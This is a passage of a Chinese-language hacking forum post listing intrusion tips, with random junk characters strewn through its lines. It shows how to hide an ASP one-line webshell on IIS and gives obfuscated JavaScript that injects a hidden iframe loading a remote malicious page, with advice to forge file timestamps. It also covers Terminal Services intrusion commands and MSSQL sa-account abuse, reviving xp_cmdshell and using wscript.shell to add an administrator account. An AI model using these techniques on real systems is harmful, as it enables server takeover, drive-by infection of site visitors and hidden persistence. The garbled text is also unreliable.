# w% M# o5 A, E5 {! {用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
' G# o& C" w+ v5 Z* d$ l" L. g* s( m% A3 @' `
53、隐藏ASP后门的两种方法# l3 x$ N- ~' S4 ?6 o: D' {
1、建立非标准目录:mkdir images..\  ~- `) A* ?  p+ o$ i
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
4 r4 |9 s* f( P! p通过web访问ASP木马:http://ip/images../news.asp?action=login
; L& K6 V7 }* ^3 D2 I1 {* s  _如何删除非标准目录:rmdir images..\ /s$ h- ~. W5 }0 J& x
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
1 ~+ p3 s5 Q# A& O7 Imkdir programme.asp& |5 a% X, M. q$ S
新建1.txt文件内容:<!--#include file=”12.jpg”-->
* b4 \  G+ P" n2 _0 i6 q4 R9 c新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
% L( C- t% \# K8 t  tattrib +H +S programme.asp
( Z: C- ^3 C& ^! ]2 N通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt! S8 O1 G0 K# v% U8 ^& \/ H, f

. m' b" z* y$ [3 _4 ?" b54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
: ~; ~6 t1 e( z  t然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。' S) u! r/ v# U7 B3 I: Q$ t

  W# N% u$ s2 D* j6 h55、JS隐蔽挂马
6 P7 ~. n) K8 U# F1.
* y& M4 @3 M4 Z  I8 qvar tr4c3="<iframe src=ht";
4 l, r: c# ^1 t, h0 k7 R. P; vtr4c3 = tr4c3+"tp:/";
% P- A" L7 u8 gtr4c3 = tr4c3+"/ww";: a- \, i0 r( F' d9 ~
tr4c3 = tr4c3+"w.tr4";! q0 C; ~9 l& r/ v% b9 c
tr4c3 = tr4c3+"c3.com/inc/m";
2 g2 G# S9 W" ^$ Itr4c3 = tr4c3+"m.htm style="display:none"></i";7 X# B' D' B+ y) t- z* _
tr4c3 =tr4c3+"frame>'";
9 _6 U! ^9 h, I7 b0 Idocument.write(tr4c3);7 ~4 `4 O0 s% t: y0 d9 b
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。5 ^3 J8 u( J" l% D2 c: I4 P

3 c# Y" y3 n* v! X2.( p! z; P( |1 W( W
转换进制,然后用EVAL执行。如+ d* S3 }2 B# W  v  s5 O9 H
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");. |) L3 O! h( j5 Z
不过这个有点显眼。
6 t) _7 t, w0 t9 Y: D  ?, o" Q3.
9 w8 l( c7 v+ K, U; bdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
: A; A4 T; H7 V$ r! M最后一点,别忘了把文件的时间也修改下。
7 i# T) k9 z3 ?2 A+ R4 x4 d! e- a" P0 [3 R7 H' m% E
56.3389终端入侵常用DOS命令/ o5 ~2 I9 v6 y. g; T( _7 B
taskkill taskkill /PID 1248 /t
* q2 P4 Q- p+ ~! v/ j. ^8 T* x/ [! q' g0 c- M1 O5 R( C8 ?
tasklist 查进程
' M+ P- g7 N/ }# x( D" |4 }- b2 F/ s# w8 `' E* y
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限. S, g, d8 t; X
iisreset /reboot, U( H% d1 G+ d, b& C1 @3 H
tsshutdn /reboot /delay:1    重起服务器. I! v: I. Z$ C! u% b0 S

  G) E0 z2 s- g( alogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
3 v5 S# q0 Y% m1 S( C: U
; C, k5 `' u: k6 ^) Rquery user 查看当前终端用户在线情况
: Q- I& v; H5 s9 V) ~
9 Q- X, @3 C7 R& M/ f/ ?要显示有关所有会话使用的进程的信息,请键入:query process *0 r8 t( }& V. a/ u: r
/ j0 L4 s9 Y5 c" ~
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:29 h) ~# o) ?. j/ U8 s
( H* |( d% \& J6 k; a
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
4 N, [' y" t( U8 x( }. [& a
2 O: x% {) `% Q5 Q要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM027 F7 g* d9 L) J6 P- s" M/ U( A
; X% n2 H1 Z( Y/ W7 n, m8 H
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启3 m; }. W6 D, t3 G1 o

  r7 S  u9 o+ u5 X命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统; l% n* E. e8 z9 a2 G+ Y) K0 [. [2 u# a

( ~* p) w5 u0 G) F" o命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。0 s7 e9 z' E% ~! f) J9 W( [
$ j. b) l& z5 C2 h" z
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
7 N$ ~9 n7 Y7 u( d# R
, n$ m) T- C: m3 J- l$ }56、在地址栏或按Ctrl+O,输入:; }# ?: p, }. k+ n) }# A
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;& C* m9 \, y7 _/ a
/ V/ c3 K% ?% Y/ c  T: w
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
/ Q' {% f7 k) x; B2 p/ p7 j
; O. I. R2 z% W' Y3 f( Y57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
# ^9 w. C) @$ F3 T! O用net localgroup administrators是可以看到管理组下,加了$的用户的。
1 q2 g4 G/ H+ p2 ^; |! z$ @3 k! A- z, P1 ]* u4 l
58、 sa弱口令相关命令
" L# R$ ^: g5 v
! x: t) t# o+ G! s- W一.更改sa口令方法:6 M9 e: h! {  W9 z8 ^/ [0 Q2 S6 q
用sql综合利用工具连接后,执行命令:
& ~4 e% J# x. R1 U4 y8 k7 g3 Qexec sp_password NULL,'20001001','sa'1 h! z* G. e. a3 v$ a
(提示:慎用!)
# D; ?* b0 J2 M5 Q2 E& _* Q
# L0 x  N2 T) b) d' K% `% Y1 {; ?) s二.简单修补sa弱口令.
2 h) m; `- _' q; j1 u: `& Y4 C$ u9 Q( u; b% [2 Y. d' R
方法1:查询分离器连接后执行:
  x  V" @/ |& L( fif exists (select * from# |2 u5 w- V: I6 G# \
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
  s# V3 U& O! r  tOBJECTPROPERTY(id, N'IsExtendedProc') = 1)6 V; }4 x: P$ V  h7 x
3 A4 d; V. n# e8 M- E
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
! E: z! k% S; ?0 l/ N
  `9 Q' E1 ~2 G" c, g/ M: jGO& u, Q) z% J3 D: A0 @
1 @; U: G% Y$ |" y9 Y1 w
然后按F5键命令执行完毕- ]( g% t2 D8 B! I" `

* Z9 y5 W5 L( R" Z方法2:查询分离器连接后1 _( O/ t( I; D) ?
第一步执行:use master& e* e- n' _& \" G: @6 W) B
第二步执行:sp_dropextendedproc 'xp_cmdshell'" F. n" p3 `& b. p; {4 T8 x, ]1 R
然后按F5键命令执行完毕
' ~# E6 _2 v3 w- A) o
( J, @. |/ \1 O2 \8 A- p% N
, r* Y: M& T, V三.常见情况恢复执行xp_cmdshell.) h: j: }" X9 a0 Q0 }# h4 Z7 a/ }
% U/ h/ l  L% J; ^! z8 S

1 }+ d' C  w0 X! E% A1 未能找到存储过程'master..xpcmdshell'.
* V% D# ]. j. `- q' J. _5 T   恢复方法:查询分离器连接后,
) h1 Z2 x3 b" c3 T9 g9 `4 v第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int8 P/ M( L& a7 B: J" l6 A' |
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'- e  C% p( K+ b: b3 T
然后按F5键命令执行完毕
/ p3 X8 K4 G+ O& |. \5 i. r. Y" Q8 C3 d( M2 Z. S1 s
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
# x5 z% O, ]7 B0 \' E; I恢复方法:查询分离器连接后,. {; b1 E& n5 ]! z
第一步执行:sp_dropextendedproc "xp_cmdshell"4 W: G9 I6 F) R* z* p2 Y0 a
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' y$ u9 m& U! h6 S- `1 b5 J然后按F5键命令执行完毕
; y) P* t. u4 h$ b2 Z4 [4 L: _& Q% x5 j9 \" Q* x
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): D# i3 G! m3 u) z
恢复方法:查询分离器连接后,
0 Q6 p; d7 s7 q+ j6 D0 o" C第一步执行:exec sp_dropextendedproc 'xp_cmdshell'9 J0 q2 K: s1 ^/ `1 R
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
0 |( g9 t  N8 P4 |( K; N( K  G然后按F5键命令执行完毕
: J7 h) Z4 @- _4 ]; I6 E
& w  N1 `* }" M8 j2 @, c. ?四.终极方法.
% R) P( R. `' H: u. D( Q8 L/ B  `如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:/ l0 \5 n3 @# Z5 u! c3 [( S+ B
查询分离器连接后,8 h, s2 g8 ~+ |5 l" H8 j
2000servser系统:; F& v! H4 z4 O7 I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add': n' s7 Y7 O. e2 r" q

! m- v2 T. h: o/ Ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'# `7 F9 H. }/ u( a
# K# u8 m+ W4 j( X" e0 p& ?, G
xp或2003server系统:. Z; V) b; ~. w# e

1 T) a* @) H; ~5 U, [) |  |# c7 P2 Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'( O, Y3 ?3 a3 q5 Y- u% L% [9 m
5 W5 b/ Y! n  m) m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 m8 d/ V2 B8 u




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2